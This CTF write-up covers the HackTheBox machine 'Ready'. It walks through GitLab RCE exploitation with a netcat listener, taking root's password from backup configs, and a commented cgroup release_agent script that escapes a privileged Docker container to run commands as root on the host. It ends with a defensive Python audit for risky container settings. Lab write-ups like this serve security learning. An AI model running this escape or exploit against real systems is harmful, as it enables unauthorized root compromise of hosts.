Hackthebox Ready WriteUp
Ready is an interesting box that teaches Docker breakout. First off, we start with a vulnerable GitLab that has a public exploit. After getting into the box we realize we are inside a Docker container, and the container has a weakness that allows executing commands outside the container and getting code execution as root on the host. With all that being said, let's just jump in!
└──╼ [★]$ nmap -sC -sV 10.10.10.220
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 10:09 BST
Nmap scan report for 10.10.10.220
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.40 seconds
The nmap scan shows the URL http://10.10.10.220:5080/users/sign_in; heading over there, we can see a GitLab instance.
Create an account, then log in and check the version.
Searching public exploits for this version turns up an RCE exploit.
Usage: python3 exploit.py -u username -p password -g http://10.10.10.220 -l 10.10.14.x -P 443
Listener: nc -nvlp 443
PrivEsc to root:
In /opt/backup there are config files, and we can grep root's password out of them.
After getting root, I realized I'm in a Docker container. But the blog below explains how to break out of Docker.
Escaping Docker Privileged Containers
Why you should not run Docker with the “privileged” flag
Created a payload based on the above blog. It mounts a cgroup hierarchy under /tmp and then executes a command outside the container. You can change cat /root/root.txt to a reverse shell if you want.
# Mount the rdma cgroup hierarchy (needs CAP_SYS_ADMIN, which --privileged grants) and create a child cgroup
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Ask the kernel to run the release_agent when the last process leaves cgroup x
echo 1 > /tmp/cgrp/x/notify_on_release
# Find the host-side path of this container's overlay upperdir (\p in sed is a literal p, so "perdir=" matches upperdir=)
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# release_agent is resolved on the host, so it must point at the host path of our script
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# /cmd inside the container is $host_path/cmd on the host; its output lands back in the container as /output
echo '#!/bin/sh' > /cmd
echo "cat /root/root.txt > $host_path/output" >> /cmd
chmod a+x /cmd
# Put a short-lived shell into cgroup x; when it exits, the cgroup empties and the host runs release_agent as root
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
As we can see, it writes the root flag to /output inside the container.
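As an added defensive check (not part of the original write-up), the Python below audits `docker inspect` output for the HostConfig settings that make this breakout possible: the `Privileged` flag, a `CapAdd` of SYS_ADMIN, and a disabled seccomp profile. The sample JSON is constructed for the example, not taken from the box.

```python
import json

# Constructed sample in the shape of `docker inspect` output (not from the box);
# only the HostConfig fields this audit reads are included.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/gitlab",
     "HostConfig": {"Privileged": True, "CapAdd": None, "SecurityOpt": None}},
    {"Name": "/web",
     "HostConfig": {"Privileged": False, "CapAdd": ["SYS_ADMIN"],
                    "SecurityOpt": ["seccomp=unconfined"]}},
    {"Name": "/db",
     "HostConfig": {"Privileged": False, "CapAdd": None,
                    "SecurityOpt": ["no-new-privileges"]}},
])

# Capabilities that allow mounting a cgroup hierarchy and writing release_agent.
ESCAPE_CAPS = {"SYS_ADMIN", "ALL"}


def audit_containers(inspect_json):
    """Return {container_name: [findings]} for containers whose HostConfig
    would permit the cgroup release_agent escape shown above."""
    findings = {}
    for c in json.loads(inspect_json):
        hc = c.get("HostConfig") or {}
        issues = []
        if hc.get("Privileged"):
            issues.append("Privileged: all capabilities, seccomp/AppArmor off, host devices exposed")
        risky = set(hc.get("CapAdd") or []) & ESCAPE_CAPS
        if risky:
            issues.append("CapAdd grants " + ", ".join(sorted(risky)))
        if "seccomp=unconfined" in (hc.get("SecurityOpt") or []):
            issues.append("seccomp disabled: mount(2) no longer filtered")
        if issues:
            findings[c["Name"].lstrip("/")] = issues
    return findings


if __name__ == "__main__":
    for name, issues in audit_containers(SAMPLE_INSPECT).items():
        print(name)
        for issue in issues:
            print("  -", issue)
```

Against a real host, feed it the output of `docker inspect $(docker ps -q)` instead of the constructed sample.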